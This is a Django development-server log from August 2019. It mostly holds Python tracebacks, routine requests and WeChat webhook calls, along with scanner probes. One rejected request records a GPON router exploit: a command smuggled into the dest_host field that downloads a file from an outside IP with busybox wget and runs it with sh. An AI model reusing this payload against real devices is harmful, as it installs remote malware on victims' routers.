During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 21:55:43] "GET / HTTP/1.1" 200 84
Not Found: /http:/www.baidu.com/cache/global/img/gs.gif
[21/Aug/2019 22:02:25] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1738
----------------------------------------
Exception happened during processing of request from ('80.82.70.187', 44208)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[21/Aug/2019 22:48:00] "GET / HTTP/1.1" 200 84
[21/Aug/2019 23:02:06] "GET / HTTP/1.1" 200 84
[22/Aug/2019 00:22:43] "GET / HTTP/1.1" 200 84
[22/Aug/2019 00:53:33] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[22/Aug/2019 00:53:33] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('181.41.215.112', 57702)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /http://www.jiujue.shop/
[22/Aug/2019 00:53:33] "GET /http%3A%2F%2Fwww%2Ejiujue%2Eshop%2F HTTP/1.1" 404 2316
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[22/Aug/2019 00:53:33] "GET /http%3A%2F%2Fwww%2Ejiujue%2Eshop%2F HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('181.41.215.112', 57716)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[22/Aug/2019 01:24:25] "GET / HTTP/1.1" 200 84
[22/Aug/2019 01:51:05] "GET / HTTP/1.1" 200 84
Not Found: /info
[22/Aug/2019 02:41:25] "GET /info HTTP/1.1" 404 2258
[22/Aug/2019 02:41:35] "GET / HTTP/1.1" 200 84
Not Found: /info
[22/Aug/2019 02:41:38] "GET /info HTTP/1.1" 404 2258
[22/Aug/2019 03:16:02] "POST /wechat?signature=9889fa5a311c7b8e809def44ee1255aac1f74cb7&timestamp=1566443762&nonce=591235750&openid=ozyx8jm9jaSBtOJOqsUQgLdwOAbM HTTP/1.1" 200 7
[22/Aug/2019 03:16:40] "POST /wechat?signature=f9eeedff0ba6c80bc78a8f37799957207f250c69&timestamp=1566443800&nonce=1184299436&openid=ozyx8jm9jaSBtOJOqsUQgLdwOAbM HTTP/1.1" 200 227
[22/Aug/2019 03:17:17] "POST /wechat?signature=0177b7bba644b0899b1af9b8f81d68a21a3139df&timestamp=1566443837&nonce=1524681906&openid=ozyx8jm9jaSBtOJOqsUQgLdwOAbM HTTP/1.1" 200 227
Not Found: /TP/public/index.php
[22/Aug/2019 04:27:37] "GET /TP/public/index.php HTTP/1.1" 404 2303
[22/Aug/2019 05:54:53] "GET / HTTP/1.1" 200 84
----------------------------------------
Exception happened during processing of request from ('73.40.49.170', 44783)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[22/Aug/2019 06:05:51] "GET / HTTP/1.1" 200 84
[22/Aug/2019 06:11:29] "GET / HTTP/1.1" 200 84
[22/Aug/2019 06:11:54] "GET / HTTP/1.1" 200 84
[22/Aug/2019 06:25:08] "GET /wechat HTTP/1.1" 200 22
[22/Aug/2019 06:28:07] "GET /wechat HTTP/1.1" 200 22
[22/Aug/2019 06:54:30] "GET / HTTP/1.1" 200 84
[22/Aug/2019 07:21:07] "GET /wechat HTTP/1.1" 200 22
[22/Aug/2019 07:21:07] "GET /wechat HTTP/1.1" 200 22
Not Found: /GponForm/diag_Form
[22/Aug/2019 07:22:16] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 2318
[22/Aug/2019 07:22:16] code 400, message Bad request syntax ('XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://167.71.172.177/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0')
[22/Aug/2019 07:22:16] "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://167.71.172.177/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0" 400 -
[22/Aug/2019 07:28:32] "GET /wechat HTTP/1.1" 200 22
[22/Aug/2019 07:28:32] "GET /wechat HTTP/1.1" 200 22
[22/Aug/2019 07:43:31] "GET /wechat HTTP/1.1" 200 22
[22/Aug/2019 07:43:31] "GET /wechat HTTP/1.1" 200 22
[22/Aug/2019 07:51:19] "GET / HTTP/1.1" 200 84
[22/Aug/2019 07:57:57] "GET / HTTP/1.1" 200 84
Not Found: /http:/www.baidu.com/cache/global/img/gs.gif
[22/Aug/2019 08:08:39] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1738
